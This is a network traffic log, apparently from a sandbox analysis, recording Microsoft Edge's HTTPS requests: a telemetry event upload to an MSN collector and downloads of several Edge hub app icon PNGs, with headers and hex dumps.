                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC1017OUTPOST /OneCollector/1.0?cors=true&content-type=application%2Fx-json-stream&client-id=NO_AUTH&client-version=1DS-Web-JS-2.2.2&apikey=0ded60c75e44443aa3484c42c1c43fe8-9fc57d3f-fdac-4bcf-b927-75eafe60192e-7279&upload-time=1732200512000&w=0&anoncknm=app_anon HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: browser.events.data.msn.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Content-Length: 4839
                                                                                                                                                                                                                                                                                                                  sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  Cookie: _C_ETH=1; USRLOC=; MUID=252611C791E3634C2B3C04F990FA6290; _EDGE_S=F=1&SID=13E45F7E6D0B6E511AE34A406C8E6FA4; _EDGE_V=1
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC4839OUTData Raw: 7b 22 6e 61 6d 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 41 70 70 45 72 72 6f 72 22 2c 22 74 69 6d 65 22 3a 22 32 30 32 34 2d 31 31 2d 32 31 54 31 34 3a 34 38 3a 33 32 5a 22 2c 22 76 65 72 22 3a 22 34 2e 30 22 2c 22 69 4b 65 79 22 3a 22 6f 3a 30 64 65 64 36 30 63 37 35 65 34 34 34 34 33 61 61 33 34 38 34 63 34 32 63 31 63 34 33 66 65 38 22 2c 22 64 61 74 61 22 3a 7b 22 62 61 73 65 44 61 74 61 22 3a 7b 7d 2c 22 62 61 73 65 54 79 70 65 22 3a 22 4d 53 2e 4e 65 77 73 2e 57 65 62 2e 42 61 73 65 22 2c 22 70 61 67 65 22 3a 7b 22 6e 61 6d 65 22 3a 22 64 65 66 61 75 6c 74 22 2c 22 70 72 6f 64 75 63 74 22 3a 22 61 6e 61 68 65 69 6d 22 2c 22 74 79 70 65 22 3a 22 64 68 70 22 2c 22 63 6f 6e 74 65 6e 74 22 3a 7b 22 63 61 74 65 67 6f 72 79 22 3a 22 73 74 61 6e 64
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"name":"MS.News.Web.AppError","time":"2024-11-21T14:48:32Z","ver":"4.0","iKey":"o:0ded60c75e44443aa3484c42c1c43fe8","data":{"baseData":{},"baseType":"MS.News.Web.Base","page":{"name":"default","product":"anaheim","type":"dhp","content":{"category":"stand
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC917INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Length: 153
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json
                                                                                                                                                                                                                                                                                                                  Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MC1=GUID=d1e76622bc8b4619ac3c909af03f60a3&HASH=d1e7&LV=202411&V=4&LU=1732200524633; Domain=.microsoft.com; Expires=Fri, 21 Nov 2025 14:48:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  Set-Cookie: MS0=4a21434177e64808a17370d23819c0a2; Domain=.microsoft.com; Expires=Thu, 21 Nov 2024 15:18:44 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                                                  time-delta-millis: 12633
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                                                  Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                                                  Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:43 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:44 UTC153INData Raw: 7b 22 61 63 63 22 3a 31 2c 22 77 65 62 52 65 73 75 6c 74 22 3a 7b 22 6d 73 66 70 63 22 3a 22 47 55 49 44 3d 64 31 65 37 36 36 32 32 62 63 38 62 34 36 31 39 61 63 33 63 39 30 39 61 66 30 33 66 36 30 61 33 26 48 41 53 48 3d 64 31 65 37 26 4c 56 3d 32 30 32 34 31 31 26 56 3d 34 26 4c 55 3d 31 37 33 32 32 30 30 35 32 34 36 33 33 22 2c 22 6d 63 31 22 3a 22 64 31 65 37 36 36 32 32 62 63 38 62 34 36 31 39 61 63 33 63 39 30 39 61 66 30 33 66 36 30 61 33 22 7d 7d
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"acc":1,"webResult":{"msfpc":"GUID=d1e76622bc8b4619ac3c909af03f60a3&HASH=d1e7&LV=202411&V=4&LU=1732200524633","mc1":"d1e76622bc8b4619ac3c909af03f60a3"}}


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  44192.168.2.84982113.107.246.404431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC438OUTGET /assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:46 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1579
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Nov 2023 21:43:08 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBDCB5DE99522A
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 49bf1879-901e-000f-7924-3c85f1000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-1777c6cb754vxwc9hC1TEBykgw0000000b7g00000000bd6p
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:46 UTC1579INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 c0 49 44 41 54 78 01 ed 58 4f 8b 5c 45 10 af 7a f3 66 66 15 c5 fd 00 42 66 f2 05 b2 22 c2 1e 54 d6 4f 90 15 c1 63 d8 e0 49 04 37 01 11 11 25 89 e0 d5 04 0f 1a f0 e0 e6 62 c4 cb 1e 44 50 21 b8 df 20 7b f0 4f 6e 1b 4f 8b 20 cc 7a 89 b3 ef 75 57 f9 ab ea 9e 37 cb 66 77 66 36 93 83 84 ad a4 d3 fd de eb 79 fd 7b bf fa 55 75 75 88 4e ed d4 9e 20 5b d9 dc ed 2d df de ed d1 63 34 a6 39 6c e5 fb c1 4a 54 39 2f 42 ab 22 d2 8b 91 54 a2 92 d4 91 63 90 6d 09 74 57 2a fd fc b7 77 9e df a6 47 b4 47 02 b8 f2 f3 60 29
                                                                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaIDATxXO\EzffBf"TOcI7%bDP! {OnO zuW7fwf6y{UuuN [-c49lJT9/B"TcmtW*wGG`)


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  45192.168.2.84982513.107.246.404431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC431OUTGET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:46 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1966
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBDCB5EC122A94
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 1c2cb10b-d01e-0008-2f24-3c7374000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-178bfbc474brk967hC1NYCfu6000000001c000000000k8b1
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:46 UTC1966INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc
                                                                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNnt*w<T:A*-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  46192.168.2.84982313.107.246.404431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC433OUTGET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1751
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBCEA8D5AACC85
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: fefcdf3e-501e-0074-52f2-3bee41000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-178bfbc474bbbqrhhC1NYCvw7400000001tg00000000ae6d
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC1751INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7
                                                                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  47192.168.2.84982413.107.246.404431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC433OUTGET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 1427
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBDCB5EF021F8E
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 02a9afe5-901e-0026-5ff2-3bf3b3000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-1777c6cb754mqztshC1TEB4mkc0000000ba00000000095y8
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC1427INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89
                                                                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  48192.168.2.84982213.107.246.404431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC430OUTGET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:46 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 2008
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBC9B5C0C17219
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: c24eb943-c01e-0058-5324-3c6c7c000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-1777c6cb754whff4hC1TEBcd6c00000009s000000000s1hd
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_MISS
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:46 UTC2008INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73
                                                                                                                                                                                                                                                                                                                  Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos


                                                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                  49192.168.2.84982013.107.246.404431464C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:45 UTC422OUTGET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:46 UTC536INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:45 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: image/png
                                                                                                                                                                                                                                                                                                                  Content-Length: 2229
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT
                                                                                                                                                                                                                                                                                                                  ETag: 0x8DBD59359A9E77B
                                                                                                                                                                                                                                                                                                                  x-ms-request-id: 998a4015-501e-005d-54f2-3b9803000000
                                                                                                                                                                                                                                                                                                                  x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                                                                                  x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                                                                                  x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                                                                                  x-azure-ref: 20241121T144845Z-1777c6cb7549x5qchC1TEBggbg0000000bcg00000000253f
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                  X-Cache-Info: L1_T2
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
